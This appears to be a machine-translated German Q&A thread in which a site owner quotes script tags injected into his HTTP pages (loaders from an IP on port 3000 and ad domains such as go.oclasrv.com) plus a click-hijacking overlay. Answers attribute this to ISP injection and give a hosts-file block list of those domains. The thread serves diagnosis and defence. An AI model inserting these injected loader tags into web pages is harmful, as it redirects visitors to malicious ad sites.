it-swarm.com.de

unbekannte Skripts laufen und leiten auf Klick auf unbekannte Websites um

Problem: - Manchmal, wenn Sie auf das NAVBAR-Menü oder auf ein div auf meiner Bootstrap-Website klicken, leitet es zu Anzeigen oder unbekannten Links in einem neuen Tab um. 

http://cobalten.com/afu.php?zoneid=1365143&var=1492756

Importierte Links aus gehosteter Datei: - 

<link rel="stylesheet" type="text/css" href="css\bootstrap.min.css">

    <script src="js/jquery.min.js"></script>
    <script src="js/main.js"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>


    <link rel="stylesheet" type="text/css" href="css\style.css">

    <link href="https://fonts.googleapis.com/css?family=Montserrat" rel="stylesheet" type="text/css">

    <link href="https://fonts.googleapis.com/css?family=Lato" rel="stylesheet" type="text/css">

    <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.0.8/css/all.css" integrity="shaxxx-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
        crossorigin="anonymous">

<script src="https://maps.googleapis.com/maps/api/js?key=xxxxxxxxxxxxxxxxxxxxxxxxxx&callback=myMap "></script>

Was ich in Inspection bekommen habe: - 

Ich habe meinen Code mehrmals überprüft, wenn beim Klicken auf das Menü keine Weiterleitung vorhanden ist. Ich habe nichts Verdächtiges gefunden ... ABER DANN, als ich Link-Weiterleitungen auf Klick erhielt, habe ich meinen Code im Browser überprüft und ich kann deutlich einige Skriptquellen sehen zu meinen Dateien hinzugefügt (kann nur im Inspektionsmodus in Browsern angezeigt werden). Sie werden nicht in meinen Code geschrieben. Unbekannte Teile meines Codes sind ..

1) HERE Die folgenden beiden Skripte ersetzen das Skript js/jquery.min.js im head-Tag

<script src='//117.240.205.115:3000/getjs?nadipdata="%7B%22url%22:%22%2Fjs%2Fjquery.min.js%22%2C%22referer%22:%22http:%2F%2Famans.xyz%2F%22%2C%22Host%22:%22amans.xyz%22%2C%22categories%22:%5B0%5D%2C%22reputations%22:%5B1%5D%7D"&amp;screenheight=768&amp;screenwidth=1360&amp;tm=1530041241377&amp;lib=true&amp;fingerprint=c2VwLW5vLXJlZGlyZWN0' async=""></script>

<script src="http://amans.xyz/js/jquery.min.js?cb=1530041241381&amp;fingerprint=c2VwLW5vLXJlZGlyZWN0&amp;onIframeFlag" type="text/javascript"></script>

2) Dieses wird direkt nach dem Import von Google API in den Body Tag eingefügt.

<span id="notiMain">
<script src="//go.oclasrv.com/apu.php?zoneid=1492761" type="text/javascript">< /script>
</span>

3) Dieses ist auch im Body-Tag.

<div class="pxdouz70egp12" style="left: 0px; top: 9360px; width: 658px; height: 650px; background-image: url("data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"); position: absolute; z-index: 2000; </div>

4) Beim Überprüfen der Weiterleitungsverbindung. Die HEADERS-Info: -

Request URL: http://cobalten.com/apu.php?zoneid=1492761&_=1530105294644
Request Method: GET
Status Code: 200 OK
Remote Address: 188.42.162.184:80
Referrer Policy: no-referrer-when-downgrade
Cache-Control: private, max-age=0, no-cache
Connection: keep-alive
Content-Encoding: gzip
Content-Type: application/x-javascript
Date: Wed, 27 Jun 2018 13:14:57 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Pragma: no-cache
Server: nginx
Strict-Transport-Security: max-age=1
Timing-Allow-Origin: *, *
Transfer-Encoding: chunked
X-Content-Type-Options: nosniff
X-Used-AdExchange: 1
Provisional headers are shown
Referer: http://amans.xyz/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
zoneid: 1492761
_: 1530105294644

Was ich versucht habe: - 

Mein Code ist sauber und es gibt kein Skript, das ihn irgendwo weiterleitet. Es kann sein, dass mein Browser oder Windows kompromittiert sind. Ich habe die Website von 3 Browsern geprüft. Edge, CHROME, FIREFOX .. haben dasselbe Problem. Dann habe ich ein Upgrade von Windows 7 auf Windows 10 durchgeführt und eine Neuinstallation durchgeführt. Aber nichts ist passiert. Dann dachte ich an den Hostgator-Support zu fragen, ob der Server kompromittiert ist. Sie antworteten, es sei von ihrem Ende her okay ... Ich habe Malwarebytes und alle Softwareprogramme installiert, um das Problem zu lösen. Sie benachrichtigen jedoch lediglich, dass chrome/firefox/Edge nach außen umgeleitet wird ID mit einigen Domainnamen meist go.oclasrv.com und nichts tun. 

**

IRGENDEINE LÖSUNGSMÖGLICHKEIT???

**

UPDATE: -

Ich habe eine ähnliche Umleitung auf den Hostgator Support Link erhalten ..

Beachten Sie, dass hier der Domainname in string durch rateus.in ersetzt wird Zoneid = 1492761 ist derselbe, was auch immer unsichere Links ich öffne .. Außerdem werden cb = xxxxxxxxxxxx und tm = xxxxxxxxxxx für verschiedene Links und Fingerprint geändert = c2VwLW5vLXJlZGlyZWN0 ist für alle von mir geöffneten Links gleich.

<script async="" src="//117.240.205.115:3000/getjs?nadipdata=&quot;%7B%22url%22:%22%2Fcommon%2Fjs%2Fjquery-1.7.1.js%22%2C%22referer%22:%22http:%2F%2Frateus.co.in%2Findex.php%3Fbrowse%3DHostGatorIN_Chat_HGIChatCSAT%22%2C%22Host%22:%22rateus.co.in%22%2C%22categories%22:%5B0%5D%2C%22reputations%22:%5B1%5D%7D&quot;&amp;screenheight=768&amp;screenwidth=1360&amp;tm=1530191489196&amp;lib=true&amp;fingerprint=c2VwLW5vLXJlZGlyZWN0"></script>

<script type="text/javascript" src="http://rateus.co.in/common/js/jquery-1.7.1.js?cb=1530191489199&amp;fingerprint=c2VwLW5vLXJlZGlyZWN0&amp;onIframeFlag"></script>

<span id="notiMain"><script type="text/javascript" src="//go.oclasrv.com/apu.php?zoneid=1492761"></script></span>

Mein Betriebssystem ist vollständig auf WIN10 Pro aktualisiert und ich habe nur Chrome ohne Plugins installiert ...

Das Problem ist vom Browser unabhängig, da ich bei Edge und Firefox die gleichen Ergebnisse erhalten habe.

Jeder JS-Experte, der mir hier helfen kann

9
aman

Dies scheint ein Fall zu sein, in dem ISP JavaScript-Dateien einfügt. Bist du zufällig auf dem BSNL-Breitband? In den letzten Tagen scheint BSNL Adware auf HTTP-Websites (nicht verschlüsselt) zu injizieren.

Die einzige Lösung, die ich kenne, ist das Hosten Ihrer Site auf https OR, um Ihren ISP zu ändern.

8
Jayson Chacko

Dieses Problem, das Sie haben, ist serverseitig. Wahrscheinlich stimmt nichts mit Ihrem Code, jedoch ist der Server mit Malware infiziert, die diesen Code in Ihre Website einfügt.

Um dies zu beheben, würde ich eine Sicherungskopie des von Ihnen geschriebenen Codes erstellen, Ihre FTP-Hosting-Passwörter ändern, Ihren Server löschen und Ihren Code wieder hinzufügen. Wenn dies das Problem nicht löst, würde ich den Hosting-Provider wechseln.

1
Jake Chasan

Wenn Sie ein unbekanntes Skript von folgenden IPs sehen, handelt es sich um die Skriptdatei, die von BSNL ISP eingefügt wurde.

61.0.245.90, 117.205.13.171

Diese Skripts werden nur eingefügt, wenn Sie HTTP-Websites besuchen. HTTPS beinhaltet Transport Layer Security, so dass es vom ISP nicht manipuliert werden kann. 

Die Skriptdateien dieser IP-Adresse sind lediglich ein Conduit, der weitere AD-Skripts von verschiedenen AD-Medien herunterlädt. Die meisten dieser AD-Medien folgen aufdringlicher Werbung, indem sie die Mausklicks von Benutzern entführen, um deren Popups zu öffnen. 

Die BSNL-Ausrede für eine solche Aktivität besteht darin, dass diese Funktion das Surferlebnis für ihre Abonnenten verbessert. Es gibt einen ausführlichen Beitrag über BSNL, der solche Skripte injiziert und wie man diese stoppt. 

0
David Chelliah

Guter Fang!

BSNL-Server haben aus Sicherheitsgründen täglich Malware/Viren beschädigt oder infiziert

Es gab naganoadigei.com , das explizit registriert wurde, um Malware bereitzustellen und Benutzer zu Phishing-Sites umzuleiten.

Kürzlich im Februar 2019 hatten sie das Problem behoben. Leider stellte sich heraus, dass die neue Art von werbebasierten Weiterleitungen humparsi.com im Februar 2019 war

Sie können überprüfen, ob die Site infiziert wurde oder nicht, indem Sie Sucuri besuchen


Alternativ können Sie die ausgehende Anforderung von Ihrem eigenständigen System im DNS-Eintrag blockieren

Navigiere zu %windir%\System32\drivers\etc und bearbeiten Sie die Datei hosts im erweiterten Modus/mit Administratorberechtigung und fügen Sie diese Zeilen zu Ihren hosts Datei

0.0.0.0 preskalyn.com
0.0.0.0 xalabazar.com
0.0.0.0 humparsi.com
0.0.0.0 naganoadigei.com
0.0.0.0 cobalten.com
0.0.0.0 rateus.co.in
0.0.0.0 go.oclasrv.com
0.0.0.0 onclickmax.com
0.0.0.0 bsnl.phozeca.com
0.0.0.0 phozeca.com
0.0.0.0 c.phozeca.com

Die oben genannten Sites sind nicht mit SSL gesichert

Um eine bestimmte IP-Adresse zu blockieren, blockieren Sie ausgehende Grenzen in der Firewall

Um die Auswirkungen oder unwahrscheinliche nachteilige Auswirkungen zu verringern, können Sie JavaScript blockieren, indem Sie Add-Ons wie NoScript oder ScriptSafe und HTTPS Everywhere installieren

So ermitteln Sie, welche Anwendung die IP-Adresse mit der zugewiesenen Portnummer verwendet:

C:\Windows\system32>netstat -anob